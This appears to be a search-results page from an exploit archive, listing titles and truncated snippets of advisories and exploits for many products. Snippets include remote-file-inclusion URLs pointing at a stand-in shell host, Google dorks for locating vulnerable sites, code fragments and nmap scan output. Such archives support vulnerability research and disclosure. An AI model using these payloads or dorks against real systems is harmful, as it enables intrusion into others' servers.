41207 matches found
Intel Network Adapter Diagnostic Driver - IOCTL Handling
Intel Network Adapter Diagnostic Driver - IOCTL Handling / Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability Vendor: Intel Product webpage: http://www.intel.com Affected products: Network Adapter Driver for Windows XP Network Adapter Driver for Windows 7 Network Adapter Driver...
Advantech EKI-6340 - Command Injection
Advantech EKI-6340 - Command Injection Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Advantech EKI-6340 Command Injection 1. Advisory Information Title: Advantech EKI-6340 Command Injection Advisory ID: CORE-2014-0009 Advisory URL:...
CMS Made Simple 1.11.9 - Multiple Vulnerabilities
CMS Made Simple 1.11.9 - Multiple Vulnerabilities Vulnerabilities in CMS Made Simple, version 1.11.9 Discovered by Pedro Ribeiro [email protected] of Agile Information Security Reported to [email protected] and [email protected] Disclosure: 28/02/2014 / Last updated: 12/10/2014 CMS...
NRPE 2.15 - Remote Code Execution
NRPE 2.15 - Remote Code Execution !/usr/bin/python Exploit Title : NRPE http://www.abcompcons.com/files/nrpeclient.py pyOpenSSL Library required http://pyopenssl.sourceforge.net/ root@localhost pip-python install pyOpenSSL NRPE = 2.15 Remote Command Execution Vulnerability Release date: 17.04.201...
Linux Kernel 3.13 - SGID Privilege Escalation
Linux Kernel 3.13 - SGID Privilege Escalation / CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC Vitaly Nikolenko http://hashcrack.org Usage: ./poc filepath where filepath is the file on which you want to set the sgid bit / define GNUSOURCE include include include include include include...
Skybox Security 6.3.x 6.4.x - Multiple Information Disclosures
Skybox Security 6.3.x 6.4.x - Multiple Information Disclosures Exploit Title: SKYBOX Security – Multiple Information Disclosure Date: 22-Jan-2014 Exploit Author: Luigi Vezzoso Vendor Homepage: http://www.skyboxsecurity.com Version: Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.1...
Dokeos 2.2 RC2 - index.php?language SQL Injection
Dokeos 2.2 RC2 - index.php?language SQL Injection Advisory ID: HTB23181 Product: Dokeos Vendor: Dokeos Vulnerable Versions: 2.2 RC2 and probably prior Tested Version: 2.2 RC2 Advisory Publication: October 30, 2013 without technical details Vendor Notification: October 30, 2013 Public Disclosure:...
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities Advisory ID: HTB23165 Product: BigTree CMS Vendor: BigTree CMS Vulnerable Versions: 4.0 RC2 and probably prior Tested Version: 4.0 RC2 Vendor Notification: July 17, 2013 Vendor Patch: July 17, 2013 Public Disclosure: August 7, 2013 Vulnerability Type...
Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities
Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities - Surveillance via Symantec Web Gateway product: Symantec Web Gateway vulnerable version:...
Clipbucket 2.6 Revision 738 - Multiple SQL Injections
Clipbucket 2.6 Revision 738 - Multiple SQL Injections Advisory ID: HTB23125 Product: ClipBucket Vendor: clip-bucket.com Vulnerable Versions: 2.6 Revision 738 and probably prior Tested Version: 2.6 Revision 738 Vendor Notification: November 7, 2012 Vendor Patch: November 28, 2012 Public Disclosure...
Sysax FTP Automation Server 5.33 - Local Privilege Escalation
Sysax FTP Automation Server 5.33 - Local Privilege Escalation Title: Sysax FTP Automation Server Local Privilege Escalation Author: Craig Freyman @cd1zz OS Tested: XP SP3 32bit Version Tested: 5.33 Date Discovered: October 1, 2012 Vendor Contacted: October 21, 2012 Vendor Response: November 1, 20...
symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities
symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities Software: Symantec Web Gateway Current Software Version: 5.0.2.8 Product homepage: www.symantec.com Author: S2 Crew Hungary CVE: CVE-2012-0297, CVE-2012-0298, ??? File include:...
PHP 5.3.8 - Multiple Vulnerabilities
PHP 5.3.8 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.3.8 Multiple vulnerabilities Author: Maksymilian Arciemowicz Website: http://cxsecurity.com/ Date: 14.01.2012 CVE: CVE-2011-4153 zendstrndup Original link: http://cxsecurity.com/research/103 --- 1. Multiple...
Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035MS11-070)
Microsoft WINS - ECommEndDlg Input Validation Error MS11-035MS11-070 Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MS WINS ECommEndDlg Input Validation Error 1. Advisory Information Title: MS WINS ECommEndDlg Input Validation Error Advisory ID: CORE-2011-0526 Advisory URL:...
Adobe Photoshop CS5 - .gif Remote Code Execution
Adobe Photoshop CS5 - .gif Remote Code Execution Application: Adobe Photoshop CS5 GIF Remote Code Execution Platforms: Adobe Photoshop CS5 12.0 and 12.1 Exploitation: Remote code execution CVE Number: CVE-2011-2131 Adobe Vulnerability Identifier: APSB11-22 PRL: 2011-08 Author: Francis Provencher...
Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)
Apple Safari 5.0.5 - SVG Remote Code Execution DEP Bypass Abysssec Public Advisory apple killed one of our 0day no point to keep it private anymore : there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool way to...
Microsoft Windows Explorer 6.0.2900.5512 - Shmedia.dll 6.0.2900.5512 AVI Preview Denial of Service (PoC)
Microsoft Windows Explorer 6.0.2900.5512 - Shmedia.dll 6.0.2900.5512 AVI Preview Denial of Service PoC done by BraniX www.hackers.org.pl found: 2011.03.27 published: 2011.03.29 tested on: Windows XP SP3 Home Edition tested on: Windows XP SP3 Professional Edition App: Windows Explorer 6.0.2900.551...
Majordomo2 - SMTPHTTP Directory Traversal
Majordomo2 - SMTPHTTP Directory Traversal Original Advisory: https://sitewat.ch/en/Advisory/View/1 Credit: Michael Brooks https://sitewat.ch Vulnerability: Directory Traversal Software: Majordomo2 Identifier:CVE-2011-0049 Vendor: http://www.mj2.org/ Affected Build: 20110121 and prior Google...
Pandora Fms 3.1 - SQL Injection
Pandora Fms 3.1 - SQL Injection + Introduction Pandora FMS for Pandora Flexible Monitoring System is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications...
textpattern CMS 4.2.0 - Remote File Inclusion
textpattern CMS 4.2.0 - Remote File Inclusion Remote File Inclusion Vulnerability ------------------------------------------------------------------------------ Textpattern index.php -------------------------------------------------------------- + Author : Sn!pEr.S!Te Hacker + Email :...
PHP-Nuke 7.08.18.1.35 - Wormable Remote Code Execution
PHP-Nuke 7.08.18.1.35 - Wormable Remote Code Execution !/usr/bin/php ?php / Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35newist as of release Vendor's Website:http://phpnuke.org/ Secuirty Researcher: Michael Brooks https://sitewat.ch Original Advisory:...
OpenSSL - Remote Denial of Service
OpenSSL - Remote Denial of Service / hoagieopensslrecordofdeath.c OPENSSL REMOTE DENIAL-OF-SERVICE EXPLOIT - OpenSSL 0.9.8m short = 16 bit - OpenSSL 0.9.8f through 0.9.8m short != 16 bit CVE-2010-0740 Bug discovered by: Bodo Moeller and Adam Langley Google Philip Olausson...
Joomla! Component com_rwcards - Local File Inclusion
Joomla! Component comrwcards - Local File Inclusion Author : altbta [email protected] Team : Sec Attack Team Home : www.v4-team.com/cc Script : Joomla Component comrwcards Bug Type : Local File Inclusion LFI Dork : inurl:"comrwcards" === Exploit ===...
IBM SolidDB - Invalid Error Code
IBM SolidDB - Invalid Error Code 1. Advisory Information Title: IBM SolidDB invalid error code vulnerability Advisory Id: CORE-2009-1027 Advisory URL: http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos Date published: 2009-11-18 Date of last update: 2009-11-18 Vendors contacted: IBM...
BPLawyerCaseDocuments - SQL Injection
BPLawyerCaseDocuments - SQL Injection x========================================================================================================================================x | AntiSecuritydotorg |...
Amaya Web Editor 11.0 - XML HTML Parser
Amaya Web Editor 11.0 - XML HTML Parser -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Amaya web editor XML and HTML parser vulnerabilities 1. Advisory Information Title: Amaya web editor XML and HTML parser...
MKPortal 1.2.1 - Multiple Vulnerabilities
MKPortal 1.2.1 - Multiple Vulnerabilities waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal = 1.2.1 ============================================================================== Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web:...
iziContents rc6 - LocalRemote File Inclusion
iziContents rc6 - LocalRemote File Inclusion o bug /". . . . .-' -...-'/ o o remote file inclusion: http://site/path/modules/search/search.php?languagehome=&rootdp=zZz&gsLanguage=http://shell? http://site/path/modules/poll/inlinepoll.php?languagehome=&rootdp=zZz&gsLanguage=http://shell?...
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure / source: https://www.securityfocus.com/bid/25774/info / The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitati...
Apache 1.3.341.3.33 (Ubuntu Debian) - CGI TTY Privilege Escalation
Apache 1.3.341.3.33 Ubuntu Debian - CGI TTY Privilege Escalation / :: Kristian Hermansen :: Date: 20070229 Description: Local attacker can influence Apache to direct commands into an open tty owned by user who started apache process, usually root. This results in arbitrary command execution...
nabopoll 1.2 - survey.inc.php?path Remote File Inclusion
nabopoll 1.2 - survey.inc.php?path Remote File Inclusion By Cr@zyKing [email protected] Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & CrackersChild & Liz0zim Script : nabopoll 1.x Risk : Remote File .nclude | High Site : http://nabocorp.com/ Google Dork : inurl:"nabopoll/" Exploit :...
EncapsCMS 0.3.6 - corecore.php Remote File Inclusion
EncapsCMS 0.3.6 - corecore.php Remote File Inclusion Firewall encapscms 0.3.6 - Remote File Include by Firewall BuG FounD by Firewall Application Affect: encapscms 0.3.6 Sorce Code: http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip Code: includeonce$root."core/Config.php";...
EZContents 2.0.3 - showpoll.php?GLOBALS[admin_home] Remote File Inclusion
EZContents 2.0.3 - showpoll.php?GLOBALSadminhome Remote File Inclusion source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these...
Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics
Simple Machines Forum SMF 1.1 rc2 - Lock Topics !/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i;...
Kayako eSupport 2.3.1 - subd Remote File Inclusion
Kayako eSupport 2.3.1 - subd Remote File Inclusion Script: Kayako eSupport Comments: It seems like the vendor silently fixed the issue in the current version more like since v2.3.5 withouth warning users of previous versions, noobs. Requires that "registerglobals" is enabled. Vulnerable File:...
Limbo CMS 1.0.4.2 - catid SQL Injection
Limbo CMS 1.0.4.2 - catid SQL Injection i Limbo CMS option=weblinks sql injection exploit i coded by Oo Usage: ?host=hostname&path=limbopath&id=userid Exemple: ?host=127.0.0.1&path=/limbo&id=1 g Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" /",$f && pregmatch"/login/",$f echo...
Mall23 - AddItem.asp SQL Injection
Mall23 - AddItem.asp SQL Injection source: https://www.securityfocus.com/bid/14898/info Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of t...
Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service
Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol ICMP are reported prone to several denial-of-service attacks. ICMP is employed by network nod...
PHPSysInfo 2.02.1 - index.php LNG File Disclosure
PHPSysInfo 2.02.1 - index.php LNG File Disclosure source: https://www.securityfocus.com/bid/7286/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. Local users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious langua...
RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection
RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection Discovery by: Olga Villagran Discovery Date: 2020-03-02 Vendor Homepage: https://www.ricoh.com/ Hardware Link:...
Joplin Desktop 1.0.184 - Cross-Site Scripting
Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Title: Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Author: Javier Olmedo Date: 2020-02-27 Vendor: Laurent Cozic Software Link: https://github.com/laurent22/joplin/archive/v1.0.184.zip Affected Version: 1.0.184 and before Patched...
Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)
Business Live Chat Software 1.0 - Cross-Site Request Forgery Add Admin Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery Add Admin Description: Operator Can Change Role User Type to admin Date: 2020-02-26 Exploit Author: Meisam Monsef Vendor Homepage:...
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: https://secu.jp/ Product Link: https://secu.jp/support/831nh1.html CVE: N/A SecuSTATION IPCAM-130 HD Came...
Cacti 1.2.8 - Remote Code Execution
Cacti 1.2.8 - Remote Code Execution Exploit Title: Cacti 1.2.8 - Remote Code Execution Date: 2020-02-03 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33 !/usr/bin/python3 import requests import sys impo...
Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation
Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group Exploit Author: Nolan B. Kennedy nxkennedy Discovery date: 2019-09-20 Vendor Homepage:...
TotalAV 2020 4.14.31 - Privilege Escalation
TotalAV 2020 4.14.31 - Privilege Escalation Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation Date: 2020-01-09 Exploit Author: Kusol Watchara-Apanukorn Vendor Homepage: https://www.totalav.com/ Version: 4.14.31 Fixed on: 5.3.35 Tested on: Windows 10 x64 CVE : CVE-2019-18194 Vulnerability...
Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font
Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- First chance exceptions are reported before any...
Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution Author: LiquidWorm Date: 2019-12-09 Product web page: https://www.inim.biz Link:...
google.com
Pentest notes for: google.com Exploit Pack Nmap 7.80 scan initiated Tue Dec 3 09:27:33 2019 as: /usr/bin/nmap -sV -A -oA log/exploitpack.com exploitpack.com Nmap scan report for exploitpack.com 132.148.22.104 Host is up 0.18s latency. rDNS record for 132.148.22.104:...
eMerge50P 5000P 4.6.07 - Remote Code Execution
eMerge50P 5000P 4.6.07 - Remote Code Execution Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution Google Dork: NA Date: 2018-11-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link: http://linear-solutions.com/nscfamily/e3-series...